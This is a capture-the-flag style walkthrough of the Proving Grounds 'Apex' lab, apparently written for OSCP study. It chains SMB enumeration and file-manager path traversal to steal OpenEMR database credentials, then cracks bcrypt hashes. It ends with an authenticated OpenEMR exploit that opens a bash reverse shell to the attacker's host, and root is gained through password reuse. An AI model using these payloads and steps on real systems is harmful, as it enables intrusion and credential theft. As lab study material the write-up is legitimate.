Proving Grounds: Apex

Al1z4deh:~# echo "Welcome"
5 min read · Dec 17, 2022

Today we will take a look at Proving Grounds: Apex. I am sharing these posts as part of my preparation for the OSCP exam, and to show the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
└─$ sudo nmap -Pn -p- -sS --open --min-rate 10000 -oN nmap/quick 192.168.168.145
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-17 07:19 EST
Nmap scan report for 192.168.168.145
Host is up (0.10s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
3306/tcp open  mysql
  • smb (445)
└─$ smbmap -H 192.168.168.145
[+] Guest session   IP: 192.168.168.145:445   Name: 192.168.168.145
        Disk        Permissions   Comment
        ----        -----------   -------
        print$      NO ACCESS     Printer Drivers
        docs        READ ONLY     Documents
        IPC$        NO ACCESS     IPC Service (APEX server (Samba, Ubuntu))


┌──(kali㉿kali)-[~/OSCP/pg]
└─$ smbclient '//192.168.168.145\docs'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Apr 9 11:47:12 2021
.. D 0 Fri Apr 9 11:47:12 2021
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021

16446332 blocks of size 1024. 10826908 blocks available
smb: \> exit

We don’t need these files yet; we will come back to the share later.

  • feroxbuster
┌──(kali㉿kali)-[~/OSCP/pg]
└─$ feroxbuster --url http://192.168.168.145/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
  • filemanager

The feroxbuster run reveals /filemanager. Its file listing shows the same two OpenEMR PDFs as the SMB docs share, so the file manager and the share are backed by the same directory.

Clicking the question-mark icon in the left corner shows the file manager's version.

Look for a public exploit for that version.

Also check the behaviour manually.

Trying to create a .php file through the create_file action shows that only certain extensions are allowed:

└─$ curl -X POST -d "paths[0]=../../../../../../../../tmp/&names[0]=hacked.php&new_content=Hacked" -H "Cookie: PHPSESSID=gn1fevoieueli7ji100gcfrmot" "http://192.168.168.145/filemanager/execute.php?action=create_file"
File extension is not allowed. Valid extensions: txt, log, xml, html, css, htm, js,

The allowlist only inspects the extension; the directory passed in paths[0] is accepted as supplied. Note also that the docs share already contains .pdf files, which are not on that list, so the extension check is clearly not the whole story.

Changing the directory in the payload while keeping an allowed extension confirms the traversal: the file is created in whatever folder paths[0] points at. Since the real goal is to read files such as PHP sources, which the manager will neither create nor serve directly, the exploit script instead copies an arbitrary server path into the share using the manager's copy/paste clipboard actions (the "Copy Clipboard" and "Paste Clipboard" steps below). Although the script prints Apache's 404 page for its last request, the copy has already succeeded: the file shows up in the docs share afterwards.
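To make the weakness concrete, here is an added example of my own (not code from this post or from the file manager) that contrasts an extension-only check with a check that also confines the resolved path to the upload directory. The allowlist is the one the server returned in the error above; UPLOAD_ROOT is an assumed path, not taken from the box; the traversal input is the one used in the curl request.

```python
import posixpath
from typing import Optional

# Extension allowlist exactly as the file manager reported it in the error above.
ALLOWED_EXTENSIONS = {"txt", "log", "xml", "html", "css", "htm", "js"}

# Assumed upload directory for the file manager (hypothetical path, not from the page).
UPLOAD_ROOT = "/var/www/html/filemanager/uploads"


def extension_allowed(name: str) -> bool:
    """The kind of check create_file performs: only the last extension is inspected."""
    if "." not in name:
        return False
    return name.rsplit(".", 1)[1].lower() in ALLOWED_EXTENSIONS


def extension_only_target(path: str, name: str) -> Optional[str]:
    """Vulnerable behaviour: the directory from paths[0] is trusted as supplied,
    so '../../../../../../../../tmp/' plus an allowed extension escapes the root."""
    if not extension_allowed(name):
        return None
    return posixpath.normpath(posixpath.join(UPLOAD_ROOT, path, name))


def hardened_target(path: str, name: str) -> Optional[str]:
    """Return the absolute target only when it is safe, otherwise None.

    Rejects disallowed extensions, NUL bytes, separators inside the file name,
    absolute or backslash-containing directories, and any result that does not
    normalise to a location strictly inside UPLOAD_ROOT.  The check is lexical;
    a real implementation should also realpath() the parent directory so that
    symlinks inside the upload tree cannot point back outside it.
    """
    if "\x00" in path or "\x00" in name:
        return None
    if not extension_allowed(name):
        return None
    if "/" in name or "\\" in name or name in ("", ".", ".."):
        return None
    if path.startswith("/") or "\\" in path:
        return None
    candidate = posixpath.normpath(posixpath.join(UPLOAD_ROOT, path, name))
    root = UPLOAD_ROOT.rstrip("/") + "/"
    # The trailing slash matters: without it 'uploads2/' would pass as a prefix.
    if not candidate.startswith(root):
        return None
    return candidate


if __name__ == "__main__":
    traversal = "../../../../../../../../tmp/"
    print("extension-only:", extension_only_target(traversal, "hacked.txt"))  # /tmp/hacked.txt
    print("hardened:      ", hardened_target(traversal, "hacked.txt"))        # None
    print("hardened ok:   ", hardened_target("docs/", "note.txt"))
```

Even the hardened check accepts double extensions such as shell.php.txt; whether a web server executes such a file depends on its handler configuration, so the upload directory should additionally be served with script execution disabled rather than relying on the extension list alone.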

└─$ python3 exploit.py http://192.168.168.145 PHPSESSID=gn1fevoieueli7ji100gcfrmot /etc/passwd                               
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.168.145 Port 80</address>
</body></html>
└─$ smbclient '//192.168.168.145\docs'
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 17 07:29:53 2022
.. D 0 Fri Apr 9 11:47:12 2021
passwd N 1607 Sat Dec 17 07:29:53 2022
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021

16446332 blocks of size 1024. 10808128 blocks available
smb: \> exit

The two PDFs in the share are about OpenEMR, and browsing to /openemr brings up an OpenEMR login page. OpenEMR's GitHub repository shows where it keeps its database configuration (sites/default/sqlconf.php), so we use the same copy trick to pull that file out of the web root:

└─$ python3 exploit.py http://192.168.168.145 PHPSESSID=gn1fevoieueli7ji100gcfrmot /var/www/openemr/sites/default/sqlconf.php
[*] Copy Clipboard
[*] Paste Clipboard
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.168.145 Port 80</address>
</body></html>

Download the file from the share and read it: it holds the MySQL user, password and database name.

└─$ smbclient '//192.168.168.145\docs'                                                                                       
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Dec 17 07:30:19 2022
.. D 0 Fri Apr 9 11:47:12 2021
passwd N 1607 Sat Dec 17 07:29:53 2022
sqlconf.php N 639 Sat Dec 17 07:30:19 2022
OpenEMR Success Stories.pdf A 290738 Fri Apr 9 11:47:12 2021
OpenEMR Features.pdf A 490355 Fri Apr 9 11:47:12 2021

16446332 blocks of size 1024. 10806848 blocks available
smb: \> mget sqlconf.php
Get file sqlconf.php? y
getting file \sqlconf.php of size 639 as sqlconf.php (1.7 KiloBytes/sec) (average 1.7 KiloBytes/sec)
smb: \> exit
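Once sqlconf.php has been pulled from the share, the credentials have to be lifted out of it. The following is an added example of mine, not part of the original post or of OpenEMR: a small parser for the simple `$name = 'value';` assignments that OpenEMR's sites/default/sqlconf.php consists of, plus a helper that turns them into the mysql invocation used in the next section. SAMPLE_SQLCONF is constructed in that layout and reuses the user and password shown on this page; the real file on the box may contain further settings.

```python
import re
import shlex
from typing import Dict

# Constructed sample in the layout of OpenEMR's sites/default/sqlconf.php.
# Values mirror the credentials used later on this page; the real file may
# hold additional settings.
SAMPLE_SQLCONF = """<?php
//  OpenEMR
//  MySQL Config

$host\t= 'localhost';
$port\t= '3306';
$login\t= 'openemr';
$pass\t= 'C78maEQUIEuQ';
$dbase\t= 'openemr';
$db_encoding\t= 'utf8';
"""

# One simple PHP string assignment per line: $name = 'value'; or $name = "value";
# Escaped quotes inside the value are not handled (sqlconf.php does not use them).
_ASSIGN = re.compile(r"""^\s*\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""", re.MULTILINE)


def parse_sqlconf(text: str) -> Dict[str, str]:
    """Map every simple string assignment in a sqlconf.php body to its value."""
    return {m.group(1): m.group(3) for m in _ASSIGN.finditer(text)}


def mysql_command(conf: Dict[str, str], host: str) -> str:
    """Build the mysql client command line from the parsed values.

    `host` is passed explicitly because sqlconf.php normally says 'localhost'
    while we connect to the exposed 3306/tcp remotely.  Values are shell-quoted
    so a password with special characters cannot break the command.
    """
    parts = [
        "mysql",
        "-u", shlex.quote(conf["login"]),
        "-p" + shlex.quote(conf["pass"]),
        "-h", shlex.quote(host),
        "-P", shlex.quote(conf.get("port", "3306")),
        "-A",
    ]
    if conf.get("dbase"):
        parts.append(shlex.quote(conf["dbase"]))
    return " ".join(parts)


if __name__ == "__main__":
    creds = parse_sqlconf(SAMPLE_SQLCONF)
    print(creds)
    print(mysql_command(creds, "192.168.168.145"))
```

Run it against the real file with `parse_sqlconf(open("sqlconf.php").read())`; the -A flag skips table-name completion so the client connects faster against a database with many tables.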
  • mysql
└─$ mysql -u openemr -pC78maEQUIEuQ -h 192.168.168.145 -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 31
Server version: 10.1.48-MariaDB-0ubuntu0.18.04.1 Ubuntu 18.04

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| openemr |
+--------------------+
2 rows in set (0.743 sec)

MariaDB [(none)]> use openemr;
Database changed
MariaDB [openemr]> show tables;

MariaDB [openemr]> select username, password from users_secure;

The users_secure table holds the OpenEMR users' password hashes. They are bcrypt hashes, which is why hashcat mode 3200 is used below with a straight wordlist attack (-a 0).

  • hashcat

hashcat.exe -m 3200 -a 0 hash.txt rockyou.txt

  • openemr

/openemr

With the cracked credentials we can log in at /openemr. Look for an exploit matching the OpenEMR version reported on the login page.

└─$ searchsploit openemr
OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated) | php/webapps/45161.py

└─$ searchsploit -m php/webapps/45161.py
Exploit: OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
URL: https://www.exploit-db.com/exploits/45161
Path: /usr/share/exploitdb/exploits/php/webapps/45161.py
Codes: N/A
Verified: True
File Type: ASCII text
Copied to: /home/kali/OSCP/pg/45161.py

Reading the script shows how it works and which arguments it expects: the OpenEMR base URL, valid application credentials (-u, -p) and the command to execute (-c).

Use it to get a reverse shell, with a listener waiting on port 445 of the attacking machine:

└─$ python2 45161.py http://192.168.168.145/openemr -u admin -p thedoctor -c 'bash -i >& /dev/tcp/192.168.49.168/445 0>&1'
  • root

The password we found earlier is also the root password, so switching to root with it is all that is needed.

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”
